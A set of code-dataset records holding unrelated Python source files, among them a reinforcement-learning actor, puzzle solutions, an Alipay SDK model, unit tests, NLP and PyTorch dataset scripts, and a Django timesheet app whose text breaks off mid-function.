# build policy and value functions\n self.pi = MLPActor(obs_dim, act_dim, hidden_sizes, activation, act_limit).to(device)\n self.q = MLPQFunction(obs_dim, act_dim, hidden_sizes, activation).to(device)\n\n def act(self, obs):\n with torch.no_grad():\n return self.pi(obs).cpu().data.numpy()\n","sub_path":"Code/core_DDPG.py","file_name":"core_DDPG.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"568646003","text":"import numpy as np\nimport re\n\n# read the data using scipy\nf = open(\"q10.in\",'r')\nr = f.read()\nf.close()\n\n# Find all values and shape them into entries\nread = np.array( [int(i) for i in re.findall(r\"-?\\d+\",r)] ).reshape(-1,4)\nposn, v = read[:,:2], read[:,2:]\n\n# Using area as heuristics\n# Idea is that area should get smaller as the word is formed\nmin_axis, max_axis = posn.min(axis=0)-1, posn.max(axis=0)+2\nsize = max_axis-min_axis\narea = int(size[0]) * int(size[1])\nnew = area\n\nwhile new <= area:\n\t# Move to new position\n\tposn += v\n\n\t# Heuristics\n\tarea = new\n\tmin_axis, max_axis = posn.min(axis=0)-1, posn.max(axis=0)+2\n\tsize = max_axis-min_axis\n\tnew = int(size[0]) * int(size[1])\n\n# Print picture\nimport matplotlib.pyplot as plt\nposn -= v\nresult = np.zeros(max_axis-min_axis,dtype=int)\nfor p in posn:\n\tx,y = p-min_axis\n\tresult[x,y]=1\nplt.plot(posn[:,:1],-posn[:,1:],'bo') # invert y because +ve y is downwards\nplt.show() # collapse window size to see picture","sub_path":"2018/Q10/q10_1.py","file_name":"q10_1.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"550148965","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayEcoPrinterStatusQueryModel(object):\n\n def __init__(self):\n self._client_id = None\n self._client_secret = None\n self._eprint_token = None\n self._machine_code = None\n\n @property\n def client_id(self):\n return self._client_id\n\n @client_id.setter\n def client_id(self, value):\n self._client_id = value\n @property\n def client_secret(self):\n return self._client_secret\n\n @client_secret.setter\n def client_secret(self, value):\n self._client_secret = value\n @property\n def eprint_token(self):\n return self._eprint_token\n\n @eprint_token.setter\n def eprint_token(self, value):\n self._eprint_token = value\n @property\n def machine_code(self):\n return self._machine_code\n\n @machine_code.setter\n def machine_code(self, value):\n self._machine_code = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.client_id:\n if hasattr(self.client_id, 'to_alipay_dict'):\n params['client_id'] = self.client_id.to_alipay_dict()\n else:\n params['client_id'] = self.client_id\n if self.client_secret:\n if hasattr(self.client_secret, 'to_alipay_dict'):\n params['client_secret'] = self.client_secret.to_alipay_dict()\n else:\n params['client_secret'] = self.client_secret\n if self.eprint_token:\n if hasattr(self.eprint_token, 'to_alipay_dict'):\n params['eprint_token'] = self.eprint_token.to_alipay_dict()\n else:\n params['eprint_token'] = self.eprint_token\n if self.machine_code:\n if hasattr(self.machine_code, 'to_alipay_dict'):\n params['machine_code'] = self.machine_code.to_alipay_dict()\n else:\n params['machine_code'] = self.machine_code\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayEcoPrinterStatusQueryModel()\n if 'client_id' in d:\n o.client_id = d['client_id']\n if 'client_secret' in d:\n o.client_secret = d['client_secret']\n if 'eprint_token' in d:\n o.eprint_token = d['eprint_token']\n if 'machine_code' in d:\n o.machine_code = d['machine_code']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/AlipayEcoPrinterStatusQueryModel.py","file_name":"AlipayEcoPrinterStatusQueryModel.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"647395425","text":"import unittest\nfrom functools import partial\n\nimport numpy as np\n\nfrom dpipe.layers import identity\nfrom dpipe.medim.preprocessing import pad, min_max_scale, normalize\nfrom dpipe.medim.utils import filter_mask, apply_along_axes\nfrom dpipe.medim.itertools import zip_equal, flatten, extract, negate_indices, head_tail, peek\n\n\nclass TestPad(unittest.TestCase):\n def test_pad(self):\n x = np.arange(12).reshape((3, 2, 2))\n padding = np.array(((0, 0), (1, 2), (2, 1)))\n padding_values = np.min(x, axis=(1, 2), keepdims=True)\n\n y = pad(x, padding, padding_values=padding_values)\n np.testing.assert_array_equal(y, np.array([\n [\n [0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0],\n [0, 0, 2, 3, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n [\n [4, 4, 4, 4, 4],\n [4, 4, 4, 5, 4],\n [4, 4, 6, 7, 4],\n [4, 4, 4, 4, 4],\n [4, 4, 4, 4, 4],\n ],\n [\n [8, 8, 8, 8, 8],\n [8, 8, 8, 9, 8],\n [8, 8, 10, 11, 8],\n [8, 8, 8, 8, 8],\n [8, 8, 8, 8, 8],\n ],\n ]))\n\n\nclass TestItertools(unittest.TestCase):\n @staticmethod\n def get_map(size):\n return TestItertools.make_iterable(range(size))\n\n @staticmethod\n def make_iterable(it):\n return map(lambda x: x, it)\n\n def test_zip_equal_raises(self):\n for args in [[range(5), range(6)], [self.get_map(5), self.get_map(6)], [range(7), self.get_map(6)],\n [self.get_map(6), range(5)], [self.get_map(6), range(5), range(7)]]:\n with self.subTest(args=args), self.assertRaises(ValueError):\n list(zip_equal(*args))\n\n def test_zip_equal(self):\n for args in [[range(5), range(5)], [self.get_map(5), self.get_map(5)],\n [range(5), self.get_map(5)], [self.get_map(5), range(5)]]:\n with self.subTest(args=args):\n self.assertEqual(len(list(zip_equal(*args))), 5)\n\n for args in [[], [range(5)], [range(5), range(5)], [range(5), range(5), range(5)]]:\n with self.subTest(args=args):\n self.assertListEqual(list(zip_equal(*args)), list(zip(*args)))\n\n def test_flatten(self):\n self.assertListEqual(flatten([1, [2, 3], [[4]]]), [1, 2, 3, 4])\n self.assertListEqual(flatten([1, (2, 3), [[4]]]), [1, (2, 3), 4])\n self.assertListEqual(flatten([1, (2, 3), [[4]]], iterable_types=(list, tuple)), [1, 2, 3, 4])\n self.assertListEqual(flatten(1, iterable_types=list), [1])\n\n def test_extract(self):\n idx = [2, 5, 3, 9, 0]\n self.assertListEqual(extract(range(15), idx), idx)\n\n def test_filter_mask(self):\n # TODO: def randomized_test\n mask = np.random.randint(2, size=15, dtype=bool)\n values, = np.where(mask)\n np.testing.assert_array_equal(list(filter_mask(range(15), mask)), values)\n\n def test_negate_indices(self):\n idx = [2, 5, 3, 9, 0]\n other = [1, 4, 6, 7, 8, 10, 11, 12]\n np.testing.assert_array_equal(negate_indices(idx, 13), other)\n\n def test_head_tail(self):\n for size in range(1, 20):\n it = np.random.randint(1000, size=size).tolist()\n head, tail = head_tail(self.make_iterable(it))\n self.assertEqual(head, it[0])\n self.assertListEqual(list(tail), it[1:])\n\n def test_peek(self):\n for size in range(1, 20):\n it = np.random.randint(1000, size=size).tolist()\n head, new_it = peek(self.make_iterable(it))\n self.assertEqual(head, it[0])\n self.assertListEqual(list(new_it), it)\n\n\nclass TestApplyAlongAxes(unittest.TestCase):\n def test_apply(self):\n x = np.random.rand(3, 10, 10) * 2 + 3\n np.testing.assert_array_almost_equal(\n apply_along_axes(normalize, x, axes=(1, 2), percentiles=20),\n normalize(x, percentiles=20, axes=0)\n )\n\n axes = (0, 2)\n y = apply_along_axes(min_max_scale, x, axes)\n np.testing.assert_array_almost_equal(y.max(axes), 1)\n np.testing.assert_array_almost_equal(y.min(axes), 0)\n\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, 1), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, -1), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, (0, 1)), x)\n np.testing.assert_array_almost_equal(apply_along_axes(identity, x, (0, 2)), x)\n","sub_path":"dpipe/medim/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"318508662","text":"import os\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport tensorflow\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\n# Read Data\n\npositive_files_names = os.listdir(\"dataset/train/positive\")\nnegative_files_names = os.listdir(\"dataset/train/negative\")\n\ndocs_list = []\n\nfor file_name in positive_files_names:\n file = open(\"dataset/train/positive/\" + str(file_name), \"r\")\n docs_list.append(file.read())\n\nfor file_name in negative_files_names:\n file = open(\"dataset/train/negative/\" + str(file_name), \"r\")\n docs_list.append(file.read())\n\nlabels_positive = [1] * len(positive_files_names)\nlabels_negative = [0] * len(negative_files_names)\n\nlabels = labels_positive + labels_negative\nlabels = np.array(labels)\n\nMAX_SEQUENCE_LENGTH = 1000\n\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(docs_list)\nsequences = tokenizer.texts_to_sequences(docs_list)\nword_index = tokenizer.word_index # the dictionary\nprint(word_index)\nprint('Found %s unique tokens.' % len(word_index))\ndocs_words_index = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of samples:', docs_words_index.shape)\nprint('Sampele:(the zeros at the begining are for padding text to max length)')\n# print(docs_words_index[2])\n\n\nEMBEDDING_DIM = 100\nprint('Indexing word vectors.')\nembeddings_index = {}\nwith open('glove.6B.100d.txt', encoding=\"utf8\") as f:\n for line in f:\n values = line.split(sep=' ')\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n# print('Found %s word vectors.' % len(embeddings_index))\n\n\nembedding_matrix = np.zeros((len(word_index) + 1, EMBEDDING_DIM))\nfor word, i in word_index.items():\n embedding_vector = embeddings_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n\n# print ('Shape of Embedding Matrix: ',embedding_matrix.shape)\n# print(embedding_matrix)\n\ndocs_words_embeddings = np.zeros((len(docs_list), MAX_SEQUENCE_LENGTH, 100))\n\nfor i in range(len(docs_words_index)):\n for j in range(MAX_SEQUENCE_LENGTH):\n word_index = docs_words_index[i][j]\n docs_words_embeddings[i][j] = embedding_matrix[word_index]\n\ndocs_sentence_embeddings = np.zeros((len(docs_list), 100))\n\nfor i in range(len(docs_words_embeddings)):\n docs_sentence_embeddings[i] = np.sum(docs_words_embeddings[i], axis=0)\n\nprint(docs_sentence_embeddings[-1])\n\nx_train, x_test, y_train, y_test = train_test_split(docs_sentence_embeddings, labels, test_size=0.20, random_state=1)\n\n# # Train model\n#\n#\n# logistic_regression = LogisticRegression()\n# logistic_regression.fit(x_train, y_train)\n#\n# # Save model\n#\n# filename = 'sentence_embedding_sum.sav'\n# pickle.dump(logistic_regression, open(filename, 'wb'))\n#\n#\n# prediction = logistic_regression.predict(x_test)\n# score = accuracy_score(y_test, prediction)\n#\n# print(\"accuracy: \")\n# print(score)\n\n\n# Load model\nfilename = 'sentence_embedding_sum.sav'\n\nloaded_logistic_regression = pickle.load(open(filename, 'rb'))\nprediction = loaded_logistic_regression.predict(x_test)\nscore = accuracy_score(y_test, prediction)\n\nprint(\"accuracy: \")\nprint(score)\n\nprint(loaded_logistic_regression.predict(docs_sentence_embeddings[:10]))\nprint(loaded_logistic_regression.predict(docs_sentence_embeddings[-10:]))\n\n","sub_path":"review classifcation/word embeddings or sentence embeddings/sum of word embeddings/sentence_embedding_sum.py","file_name":"sentence_embedding_sum.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"267895260","text":"#! /usr/bin/env python3\n\nimport MeCab\nraw_filename = 'neko.txt'\nfilename = 'neko.txt.mecab'\n\ndef write_morphological_analysis_result(n = None):\n lines = readlines_from(raw_filename, n)\n result = morphological_analysis(lines)\n with open(filename, 'w') as f:\n for r in result:\n f.write(r)\n\ndef read_morphological_analysis_result(n = None):\n return readlines_from(filename, n)\n\ndef parse_morphological_analysis_result(lines):\n lines_list = split_into_lines_list(lines)\n map_list = []\n for lines_list_elem in lines_list:\n m = make_map_from(lines_list_elem)\n map_list.append(m)\n return map_list\n\ndef split_into_lines_list(lines):\n lines_list = []\n begin = 0\n while begin < len(lines):\n line = split_lines_begin_with(lines, begin)\n lines_list.append(line)\n begin += len(line) + 1\n return lines_list\n\ndef split_lines_begin_with(lines, begin):\n eos = 'EOS'\n index_eos = lines.index(eos, begin)\n return lines[begin : index_eos]\n\ndef make_map_from(lines_list_elem):\n map_list= []\n for l in lines_list_elem:\n elem_list = l.split('\\t')\n surface = elem_list[0]\n base = elem_list[2]\n pos = elem_list[3]\n pos1 = elem_list[4]\n m = dict(surface = surface, base = base, pos = pos, pos1 = pos1)\n map_list.append(m)\n return map_list\n\ndef get_tagger():\n return MeCab.Tagger('-O chasen')\n\ndef morphological_analysis(lines, tagger = None):\n t = tagger\n if t is None:\n t = get_tagger()\n ret = []\n for l in lines:\n ret.append(morphological_analysis_one_line(l, t))\n return ret\n\ndef morphological_analysis_one_line(line, tagger):\n return tagger.parse(line)\n\ndef readlines_from(filename, n = None):\n with open(filename) as f:\n lines = f.readlines()\n if n is None or n > len(lines):\n return list(map(lambda x: rstrip_only_new_line(x), lines))\n else:\n return list(map(lambda x: rstrip_only_new_line(x), lines[ : n]))\n\ndef rstrip_only_new_line(x):\n stripped = x\n while True:\n if len(stripped) <= 0:\n return stripped\n if stripped[-1] == '\\n':\n stripped = stripped[ : -1]\n else:\n break\n return stripped\n\ndef write_map_list(map_list):\n for map_list_elem_for_oneline in map_list:\n write_oneline(map_list_elem_for_oneline)\n\ndef write_oneline(oneline):\n for m in oneline:\n print(m)\n\nif __name__ == '__main__':\n #write_morphological_analysis_result()\n lines = read_morphological_analysis_result()\n map_list = parse_morphological_analysis_result(lines)\n write_map_list(map_list)\n","sub_path":"language_processing_100/python3/sect4/NLP30.py","file_name":"NLP30.py","file_ext":"py","file_size_in_byte":2673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"302438054","text":"\"\"\"\nQ199: medium\nBinary tree right side view.\nStatus: finished :)\n\n20210614\n\nBFS\n\nGiven a binary tree, imagine yourself standing on the right side of it,\nreturn the values of the nodes you can see ordered from top to bottom.\n\nExample:\n\nInput: [1,2,3,null,5,null,4]\nOutput: [1, 3, 4]\nExplanation:\n\n 1 <---\n / \\\n2 3 <---\n \\ \\\n 5 4 <---\n\n\"\"\"\nfrom typing import List\nfrom collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n\n if not root:\n return []\n right_view = []\n from collections import deque\n queue = deque([(root, 0)])\n\n while queue:\n curr, level = queue.popleft()\n if level + 1 > len(right_view):\n right_view.append(curr.val)\n else:\n right_view[level] = curr.val\n\n if curr.left:\n queue.append((curr.left, level+1))\n if curr.right:\n queue.append((curr.right, level+1))\n\n return right_view\n\n\n\n\n\n","sub_path":"Q199-3.py","file_name":"Q199-3.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"268797857","text":"import torch\nimport torchvision\nfrom torch.utils.data import DataLoader, Dataset\nfrom PIL import Image\nimport zipfile\nfrom io import BytesIO\nimport numpy as np\nimport gc\nfrom tqdm import tqdm\n\n'''\n1. This is dataset to read image from ZIP file\n2. reading is done once during ojject creation and store inot RAM. this help to avoid reading during getitem and speedup training time.\n3. as this load all images into RAM, this class is suitable for limited dataset size that fit into RAM\nCreating custom dataset class by inherting torch.utils.data.Dataset and overide following methods:\n1. __len__ : returns the size of the dataset\n2. __getitem__: to support indexing such that dataset[i] can be used to get the sample\n\nreferenced material: https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n'''\nclass DepthMapDatasetZip(Dataset):\n \"\"\" Depth Map dataset\"\"\"\n def __init__(self, zf_dict, im_files, bg_transform=None, fgbg_transform=None, mask_transform=None, depth_transform=None):\n \"\"\"\n Args:\n zf_dict (dict): zip file resources for all dataset with items names : \"bg\", \"fgbg\", \"mask\" and \"depth\"\n im_files: list of file to be loaded into memory (file name format: fg001_bg001_10.jpg)\n data_transform (callable, optional): optional transform to be applied on bg and fgbg images \n target_transform (callable, optional): optional transform to be applied on mask and depth images. these are ground truth\n\n NOTE: zip file resources shall be open and closed by the user\n \"\"\"\n self.zf_dict = zf_dict\n\n self.bg_transform = bg_transform\n self.fgbg_transform = fgbg_transform\n self.mask_transform = mask_transform\n self.depth_transform = depth_transform\n\n # fgbg, mask and depth retain the same file names\n self.im_files = im_files\n\n '''\n keeping all the data loaded and applied data transformation as well. \n doing so mean data is already ready and __getitem__ fxn will be fast during training \n '''\n self.fgbg_data = self.load_data(zf_dict[\"fgbg\"], self.fgbg_transform, kind=\"fgbg\")\n self.mask_data = self.load_data(zf_dict[\"mask\"], self.mask_transform, kind=\"mask\")\n self.depth_data = self.load_data(zf_dict[\"depth\"], self.depth_transform, kind=\"depth\")\n self.bg_data = self.load_bg_data(zf_dict[\"bg\"], self.bg_transform, kind=\"bg\")\n\n def __len__(self):\n return len(self.im_files)\n\n def __getitem__(self, idx):\n\n if(torch.is_tensor(idx)):\n idx = idx.tolist()\n \n # format fgxxx_bgxxx_xx.jpg\n filename = self.im_files[idx]\n\n # for fgbg, mask and depth all its image data are loaded on same index location\n im_fgbg = self.fgbg_data[idx]\n im_mask = self.mask_data[idx]\n im_depth = self.depth_data[idx]\n \n # load bg data\n bg_idx = np.uint8(filename.split(\"_\")[1][2:]) # get bg num from the file name\n im_bg = self.bg_data[bg_idx-1]\n\n sample = {\"bg\": im_bg, \"fgbg\": im_fgbg, \"mask\": im_mask, \"depth\": im_depth}\n return sample\n\n def read_image_from_zip(self, zf, filename):\n data = zf.read(filename)\n dataEnc = BytesIO(data)\n img = Image.open(dataEnc)\n del data\n del dataEnc\n return img\n\n def load_data(self, zf, transform, kind):\n load_images = []\n pbar = tqdm(self.im_files)\n for file in pbar:\n im = self.read_image_from_zip(zf, file)\n if transform is not None:\n im = transform(im)\n load_images.append(im)\n pbar.set_description(desc= f'Loading {kind} Data: ')\n gc.collect() # free unused memory\n return load_images\n\n '''\n gb have files with names as img_xxx.jpg(001 to 100)\n currently all the 100 bg images ae loaded so that we can directly access bg image throuhg its index number(1-100)\n later we can optimize it to load only relevent number of images..\n right max over head is instead of loading 100 images we are loading 200 (100 each for train and test data set, just to reduce time complexcity)\n '''\n def load_bg_data(self, zf, transform, kind):\n load_images = []\n pbar = tqdm(np.arange(1,101))\n for idx in pbar:\n filename = f'img_{idx:03d}.jpg'\n im = self.read_image_from_zip(zf, filename)\n if transform is not None:\n im = transform(im)\n load_images.append(im)\n pbar.set_description(desc= f'Loading {kind} Data: ')\n return load_images\n\n def get_count(self):\n ds_cnt = {\"bg\": len(self.bg_data), \n \"fg_bg\": len(self.fgbg_data),\n \"fg_bg_mask\": len(self.mask_data),\n \"fg_bg_depth\": len(self.depth_data)}\n return ds_cnt\n\n'''\n1. Dataset to read images from folder\n2. this will slow the training as every time getitem is called image is read from file system\n3. as all images are not loaded at once in RAM, so suitable to training large dataset\n\nCreating custom dataset class by inherting torch.utils.data.Dataset and overide following methods:\n1. __len__ : returns the size of the dataset\n2. __getitem__: to support indexing such that dataset[i] can be used to get the sample\n\nreferenced material: https://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n'''\nclass DepthMapDatasetFolder(Dataset):\n \"\"\" Depth Map dataset\"\"\"\n def __init__(self, ds_folder_dict, im_files, bg_transform=None, fgbg_transform=None, mask_transform=None, depth_transform=None):\n \"\"\"\n Args:\n img_folders (dict): items names : \"bg\", \"fgbg\", \"mask\" and \"depth\"\n im_files: image filename list for the dataset(file name format: fg001_bg001_10.jpg)\n xxxx_transform (callable, optional): optional transform to be applied on respective image kind \n \"\"\"\n self.ds_folder_dict = ds_folder_dict\n\n self.bg_transform = bg_transform\n self.fgbg_transform = fgbg_transform\n self.mask_transform = mask_transform\n self.depth_transform = depth_transform\n\n #fgbg, mask and depth retain the same file names. bg file name to be retrieve from this image file name\n self.im_files = im_files \n\n def __len__(self):\n return len(self.im_files)\n\n def __getitem__(self, idx):\n\n if(torch.is_tensor(idx)):\n idx = idx.tolist()\n\n im_fgbg = self.load_data(f'{self.ds_folder_dict[\"fgbg\"]}/{self.im_files[idx]}', self.fgbg_transform)\n im_mask = self.load_data(f'{self.ds_folder_dict[\"mask\"]}/{self.im_files[idx]}', self.mask_transform)\n im_depth = self.load_data(f'{self.ds_folder_dict[\"depth\"]}/{self.im_files[idx]}', self.depth_transform)\n \n # load bg data: read gb num from : format fgxxx_bgxxx_xx.jpg\n #bg_num = np.uint8(self.im_files[idx].split(\"_\")[1][2:]) # get bg num from the file name\n #im_bg = self.load_data(f'{self.ds_folder_dict[\"bg\"]}/img_{bg_num:03d}.jpg', self.depth_transform)\n \n bg_num = self.im_files[idx].split(\"_\")[1][2:] # get bg num from the file name\n im_bg = self.load_data(f'{self.ds_folder_dict[\"bg\"]}/img_{bg_num}.jpg', self.bg_transform)\n\n sample = {\"bg\": im_bg, \"fgbg\": im_fgbg, \"mask\": im_mask, \"depth\": im_depth}\n return sample\n\n def load_data(self, filename, transform):\n im = Image.open(filename)\n if transform is not None:\n im = transform(im)\n return im\n \nclass DepthMapDatasetFxn():\n def __init__(self):\n self.dum = 0\n\n def get_random_filelist(self, im_files):\n idx_list = np.arange(len(im_files))\n np.random.shuffle(idx_list)\n shuffled_im_files = [im_files[idx] for idx in idx_list]\n return shuffled_im_files\n\n def train_test_split(self, im_files, test_size=0.3):\n idx_list = np.arange(len(im_files))\n np.random.shuffle(idx_list)\n shuffle_im_files = [im_files[idx] for idx in idx_list]\n n_train = int(np.round((1-test_size)*len(im_files)))\n return shuffle_im_files[:n_train], shuffle_im_files[n_train:]\n\n def save_img_filenames(self, img_name_list, filename):\n # open file and write the content\n with open(filename, 'w') as filehandle:\n filehandle.writelines([f'{name}\\n' for name in img_name_list])\n\n def read_img_filenames(self, filename):\n img_name_list = []\n # open file and read the content in a list\n with open(filename, 'r') as filehandle:\n filecontents = filehandle.readlines()\n for line in filecontents:\n img_name = line[:-1] # remove linebreak which is the last character of the string\n img_name_list.append(img_name) # add item to the list\n return img_name_list","sub_path":"session15/s15_qualifier/utils/DepthMapDataset.py","file_name":"DepthMapDataset.py","file_ext":"py","file_size_in_byte":9086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"638008916","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom calendar import monthrange\nimport csv\nfrom StringIO import StringIO\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\nfrom django.http import Http404\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import View, ListView\nfrom django.contrib.auth.views import login, logout\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import FormView\nfrom models import ListOfStaff, LosTeacher, LosScientist, OperatingScheduleWeekly, WorkTime\nfrom .models import Department, Project # REASON_WORK\nfrom datetime import datetime, date, timedelta, time\nfrom django.db.models import Q\nfrom django.contrib.auth.models import User\nfrom work_registration import start_work, stop_work, cancel_start_work, cancel_stop_work\nfrom django.shortcuts import redirect\nimport pytz\nfrom .forms import TabelDialogForm\nfrom .models import Department, TimeboardPermission\nfrom .tabel import build_tabel_as_tbl, build_actual_time_tabel_as_tbl\n# приклад class view: http://polydoo.com/code/?p=172\n\n\ndef home(request):\n if request.user.is_authenticated():\n user_id = request.user.id\n # cur_date = date.today() # date(2014, 8, 10)\n # cur_time = datetime.now().time()\n # for tz in pytz.all_timezones: print tz\n\n cur_date_time = datetime.now(pytz.timezone('Europe/Kiev'))\n cur_date = cur_date_time.date()\n cur_time = cur_date_time.time()\n\n\n if request.method == 'POST':\n for name in request.POST:\n if name.startswith('start_'):\n los_id = name.split('_')[1]\n start_work(user_id, los_id, cur_date, cur_time)\n return redirect('/home/', permanent=True)\n elif name.startswith('stop_'):\n worktime_id = name.split('_')[1]\n stop_work(user_id, worktime_id, cur_date, cur_time)\n return redirect('/home/', permanent=True)\n elif name.startswith('cancelstop_'):\n worktime_id = name.split('_')[1]\n cancel_stop_work(worktime_id)\n return redirect('/home/', permanent=True)\n elif name.startswith('cancelstart_'):\n worktime_id = name.split('_')[1]\n cancel_start_work(worktime_id)\n return redirect('/home/', permanent=True)\n\n timeboard_lst = read_user_timeboard(user_id, cur_date)\n\n return render(request, 'home.html', {'timeboard': timeboard_lst})\n else:\n return login_user(request)\n\n\ndef worktime(request):\n if request.user.is_authenticated():\n user_id = request.user.id\n\n return render(request, 'worktime.html')\n else:\n return login_user(request)\n\n\nclass TabelDialogView(FormView):\n template_name = 'tabel_dialog.html'\n success_url = '/tabel/'\n form_class = TabelDialogForm\n\n\n def dispatch(self, request, *args, **kwargs):\n if request.user.is_authenticated():\n return super(TabelDialogView, self).dispatch(request, *args, **kwargs)\n else:\n return login_user(request)\n\n def form_valid(self, form):\n tabel_parms = self.extract_tabel_parms(form.cleaned_data)\n url_txt = self.build_tabel_url(tabel_parms)\n return redirect(url_txt)\n\n def extract_tabel_parms(self, form_data):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n\n dept_code, proj_code = form_data['department'].split(',')\n return {'dept_code': dept_code,\n 'proj_code': proj_code,\n 'is_staffer': form_data['is_staffer'],\n 'year_num': form_data['year_num'],\n 'month_num': form_data['month_num'],\n 'is_first_half_of_month': form_data['is_first_half_of_month'],\n 'user_id': self.request.user.id\n }\n\n def build_tabel_url(self, tabel_parms):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n user_id = tabel_parms['user_id']\n if self.has_user_permission(user_id):\n url = '/tabel/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/0' % tabel_parms\n else:\n url = '/tabel/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/%(user_id)s' % tabel_parms\n return url\n\n def has_user_permission(self, user_id):\n rs = TimeboardPermission.objects.filter(user=user_id)\n if rs.count() == 0:\n return False\n else:\n return True\n\n def get_form_kwargs(self):\n \"\"\"\n Returns the keyword arguments for instantiating the form TabelDialogForm.\n \"\"\"\n kwargs = super(TabelDialogView, self).get_form_kwargs()\n user_id = self.request.user.id\n departments = self.get_departments(user_id)\n kwargs['departments'] = departments\n return kwargs\n\n def get_departments(self, user_id):\n rs = Department.objects.raw(\"\"\"\n select D.id,\n D.dept_name,\n PR.id as proj_id,\n PR.project_title,\n P.user_id\n from tb_department D join tb_timeboard_permission P on P.department_id = D.id\n left outer join tb_project PR on PR.department_id = D.id\n where P.user_id = %s\n \"\"\", (user_id,))\n\n # depts = [('%d,%d' % (r.id, r.proj_id if r.proj_id is not None else 0),\n # r.dept_name + ('; ' + r.project_title if r.project_title is not None else ''))\n # for r in rs]\n\n depts = self.get_depts_lst(rs)\n\n if len(depts) == 0:\n rs = Department.objects.raw(\"\"\"\n select D.id, D.dept_name, PR.id as proj_id, PR.project_title, S.user_id\n from tb_department D join tb_list_of_staff S on S.department_id = D.id\n left outer join tb_project PR on PR.department_id = D.id\n where S.user_id = %s\n \"\"\", (user_id,))\n depts = self.get_depts_lst(rs)\n\n return depts\n\n def get_depts_lst(self, rs):\n depts = [('%d,%d' % (r.id, r.proj_id if r.proj_id is not None else 0),\n r.dept_name + ('; ' + r.project_title if r.project_title is not None else ''))\n for r in rs]\n return depts\n\n\nclass WorktimeDialogView(TabelDialogView):\n template_name = 'worktime_dialog.html'\n success_url = '/worktime/'\n\n def build_tabel_url(self, tabel_parms):\n # dept_code, is_staffer, year_num, month_num, is_first_half_of_month\n user_id = tabel_parms['user_id']\n if self.has_user_permission(user_id):\n url = '/worktime/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/0' % tabel_parms\n else:\n url = '/worktime/%(dept_code)s/%(proj_code)s/%(is_staffer)i/%(year_num)i/%(month_num)s' \\\n '/%(is_first_half_of_month)i/%(user_id)s' % tabel_parms\n return url\n\n\nclass TabelListView(ListView):\n template_name = 'tabel.html'\n context_object_name = 'tabel_lst'\n\n def post(self, request, *args, **kwargs):\n self.object_list = self.get_queryset()\n allow_empty = self.get_allow_empty()\n\n # if not allow_empty:\n # # When pagination is enabled and object_list is a queryset,\n # # it's better to do a cheap query than to load the unpaginated\n # # queryset in memory.\n # if (self.get_paginate_by(self.object_list) is not None\n # and hasattr(self.object_list, 'exists'))\n # is_empty = not self.object_list.exists()\n # else:\n # is_empty = len(self.object_list) == 0\n # if is_empty:\n # raise Http404(_(\"Empty list and '%(class_name)s.allow_empty' is False.\") % {'class_name': self.__class__.__name__})\n\n context = self.get_context_data()\n\n tabel_name = 'october_tabel'\n\n response = HttpResponse(mimetype='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=%s.csv' % tabel_name\n writer = csv.writer(response, csv.excel)\n response.write(u'\\ufeff'.encode('utf8')) # BOM (optional...Excel needs it to open UTF-8 file properly)\n\n writer.writerow(10*[' '] + [smart_str(u\"Табель\")])\n writer.writerow(10*[' '] + 